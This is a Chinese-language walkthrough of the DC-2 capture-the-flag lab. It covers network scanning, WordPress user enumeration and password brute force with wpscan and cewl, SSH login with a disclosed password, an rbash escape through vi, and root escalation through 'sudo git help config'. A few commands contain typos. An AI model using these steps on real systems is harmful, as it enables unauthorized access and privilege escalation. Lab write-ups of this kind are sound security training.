nmap进行主机扫描,发现存活主机192.168.85.169
nmap 192.168.85.0/24

2.nmap对主机192.168.85.169进行端口扫描和服务扫描,发现还开放了7744是ssh服务,这题估计会用到ssh
nmap 192.168.85.169 -p1-65335
nmap -sV 192.168.85.169 -p1-65535


3.访问网站,发现跳转到dc-2了,无法访问,需要更改hosts文件,再次访问

得到第一个flag

让你使用cewl生成字典,进行暴力破解,cms为wordpress,可以进行目录爆破或者搜默认位置登录位置为wp-admin,尝试弱密码失败,但是知道用户名了是admin

用cewl生成密码,再用burp跑没跑出来
4.站点cms是wordpress,有一款扫描工具wpscan,可以进行扫描用户,进行登录爆破
wpscan --url http://dc-2 -e u #跑用户名

组成一个字典user.txt
使用cewl去跑,这里生成最小5位和6位的密码都可以
cewl http://dc-2 -w pass.txt
cewl http;//dc-2 -m 5 pass.txt
cewl http://dc-2 -m 6 pass.txt

使用wp-admin进行爆破
wpscan --url http://dc-2 -U user.txt -P pass.txt

5.登录找到第二个flag


这句话意思是如果你不能攻下wordpress,且先走捷径,这里有另外一条路
希望你找到进入的方法
6.使用ssh进行登录
这个地方尝试进行了写木马,但是写入的是html代码,只能更改文章,而不能进行修改源码,上传文件一类的操作,结合前面的信息搜集7744为ssh服务
jerry登录失败,用tom登录,密码 parturient

很多命令用不了

rbash是一个受限的bash
7.找到flag3.txt
vi flag3.txt

意思是tom总是比jerry跑的慢,大概可能他需要使用su去处理事情
8.需要提高tom的权限,su切换到jerry用户,进行rbash的vi提权
compgen -c #查看可以使用的命令
# vim/vi进入之后
:set shell=/bin/sh # 或者用/bin/bash
:shell
# 切换完成之后还要添加环境变量。给$PATH变量增加两个路径,用来查找命令
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

9.找到flag4

意思是你成功做到了这,但是这不是你的家,你仍然需要找到最后的flag,这是很重要的,这没有hints,你需要自己做,继续做吧,使用git走出这里
10.git提权
sudo -l #查看可以执行那些命令
sudo git help config
!/bin/sh #进入命令行
whoami #需要加!


参考文章: